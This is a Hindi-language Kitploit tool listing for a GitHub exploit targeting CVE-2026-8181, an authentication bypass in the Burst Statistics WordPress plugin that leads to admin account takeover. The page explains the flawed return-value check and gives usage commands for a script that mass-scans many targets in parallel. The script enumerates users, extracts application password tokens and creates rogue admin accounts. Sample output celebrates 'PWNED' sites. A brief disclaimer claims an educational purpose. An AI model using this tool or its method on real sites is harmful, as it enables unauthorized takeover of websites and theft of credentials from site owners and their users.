Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-8181 — CVE-2026-8181 | बर्स्ट स्टैटिस्टिक्स 3.4.0 - 3.4.1.1 - प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण | Kitploit
उपकरण/GitHubGitHub/xshadow-here/cve-2026-8181
विशेषाधिकार वृद्धिटोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubxshadow-here/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 | बर्स्ट स्टैटिस्टिक्स 3.4.0 - 3.4.1.1 - प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण

133 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-8181

Burst Statistics | प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण

विवरण :

Burst Statistics 3.4.0 - 3.4.1.1 - प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण

बर्स्ट स्टैटिस्टिक्स – प्राइवेसी-फ्रेंडली वर्डप्रेस एनालिटिक्स (गूगल एनालिटिक्स विकल्प) प्लगइन वर्डप्रेस के लिए संस्करण 3.4.0 से 3.4.1.1 में प्रमाणीकरण बाईपास के लिए संवेदनशील है। यह is_mainwp_authenticated() फंक्शन में ऑथराइजेशन हेडर से एप्लीकेशन पासवर्ड को मान्य करते समय गलत रिटर्न-वैल्यू हैंडलिंग के कारण होता है। फंक्शन wp_authenticate_application_password(null, $username, $password) को कॉल करता है जो null (न कि WP_Error) लौटाता है जब लक्ष्य उपयोगकर्ता के पास कोई एप्लीकेशन पासवर्ड कॉन्फ़िगर नहीं होता है। चूंकि कोड केवल is_wp_error() की जाँच करता है, यह wp_set_current_user() को कॉल करने के लिए आगे बढ़ता है — जो पूरे अनुरोध के लिए हमलावर को पूर्ण व्यवस्थापक विशेषाधिकार प्रदान करता है।

बाईपास प्लगइन के बूटस्ट्रैप में has_admin_access() के माध्यम से plugins_loaded (प्राथमिकता 9) के दौरान ट्रिगर होता है, जिसका अर्थ है कि उपयोगकर्ता प्रतिरूपण वर्डप्रेस REST API द्वारा किसी भी रूट को डिस्पैच करने से पहले होता है — जो व्यवस्थापक के रूप में सभी WP कोर एंडपॉइंट्स (/wp/v2/users, /wp/v2/users/me, आदि) तक पहुंच की अनुमति देता है।

यह अप्रमाणित हमलावरों के लिए, एक व्यवस्थापक उपयोगकर्ता नाम के ज्ञान के साथ, किसी भी यादृच्छिक बेसिक ऑथेंटिकेशन पासवर्ड की आपूर्ति करके उस व्यवस्थापक का प्रतिरूपण करना संभव बनाता है, जिससे पूर्ण विशेषाधिकार वृद्धि और व्यवस्थापक खाता अधिग्रहण प्राप्त होता है।

INFO : CVE-2026-8181

~ CVSS स्कोर: 9.8 (गंभीर)

~ CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

~ प्रभावित संस्करण: 3.4.0 - 3.4.1.1

~ पैच किया गया संस्करण: 3.4.2

  • शोधकर्ता : Chloe Chamberland - Wordfence

उपयोग :

एकल लक्ष्य :

  • python3 shadow.py -u https://target.com

ज्ञात उपयोगकर्ता नाम के साथ एकल लक्ष्य :

  • python3 shadow.py -u https://target.com -U admin

सामूहिक लक्ष्य :

  • python3 shadow.py -f targets.txt -t 20

इंटरैक्टिव मोड :

  • python3 shadow.py
  • input target file name
  • input thread 1-50 max
  • input timeout 5-30s

विशेषताएं :

  • मल्टी-थ्रेडिंग (50 थ्रेड तक सामूहिक स्कैन)
  • X-BURSTMAINWP हेडर + बेसिक ऑथ के माध्यम से प्रमाणीकरण बाईपास
  • स्वचालित वर्डप्रेस पहचान
  • बर्स्ट स्टैटिस्टिक्स संस्करण पहचान और संवेदनशील संस्करण जांच
  • रूट सक्रिय जांच (/burst/v1/mainwp-auth)
  • उपयोगकर्ता गणना (REST API + Author Archive + oEmbed फॉलबैक)
  • एप्लीकेशन पासवर्ड टोकन निष्कर्षण
  • WP REST API के माध्यम से व्यवस्थापक उपयोगकर्ता निर्माण
  • व्यवस्थापक पासवर्ड रीसेट (फॉलबैक)
  • wp-login.php के माध्यम से अधिग्रहण सत्यापन
  • स्वचालित HTTP/HTTPS फॉलबैक और पुनः प्रयास
  • त्रिगुण आउटपुट (user.txt, token.txt, new-user-and-header.txt)

आउटपुट :

root@kitploit:~

╔══════════════════════════════════════════════════════╗
║  🔥 CVE-2026-8181 Burst Statistics Auth Bypass       ║
║  👩‍💻 Friska & Shadow | Route Check | Full Fallback  ║
║  🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output        ║
╚══════════════════════════════════════════════════════╝

[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/

root@kitploit:~

⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────

╔══════════════════════════════════╗
║       📊 SCAN SUMMARY            ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12                     ║
║ ☠️  DEAD: 8                      ║
║ 🔒 SECURED: 5                    ║
║ ⚠️  PATCHED: 15                  ║
║ ❌ FAILED: 10                    ║
╠══════════════════════════════════╣
║ Total: 50                        ║
╚══════════════════════════════════╝

[+] 📁 user.txt | token.txt | new-user-and-header.txt

अस्वीकरण :

यह उपकरण केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए है।

उन प्रणालियों का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।

टूल डाउनलोड करें